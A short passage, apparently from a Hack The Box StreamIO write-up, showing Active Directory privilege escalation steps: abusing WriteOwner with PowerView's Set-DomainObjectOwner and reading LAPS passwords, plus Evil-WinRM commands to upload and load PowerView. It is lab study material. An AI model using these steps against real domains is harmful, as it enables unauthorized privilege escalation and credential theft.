A1vinSmith/OSEP/HTB/Windows/StreamIO/README.md

 Expanding out from Core Staff and setup the DC.STREAMIO.HTB as ending node while the JDgodd as statintg node, it has ReadLAPSPassword on the DC computer object:

 ##### Add JDgodd to the CORE STAFF group
+Optional `Set-DomainObjectOwner -Identity 'CORE STAFF' -OwnerIdentity JDgodd -Cred $cred` as JDgodd has WriteOwner ACL attributed to their account, we can also set JDgodd as the domain object owner of `CORE STAFF` using `Set-DomainObjectOwner`.

 ```cmd
 *Evil-WinRM* PS C:\Users\nikk37\Documents> upload PowerView.ps1
 *Evil-WinRM* PS C:\Users\nikk37\Documents> Import-Module .\PowerView.ps1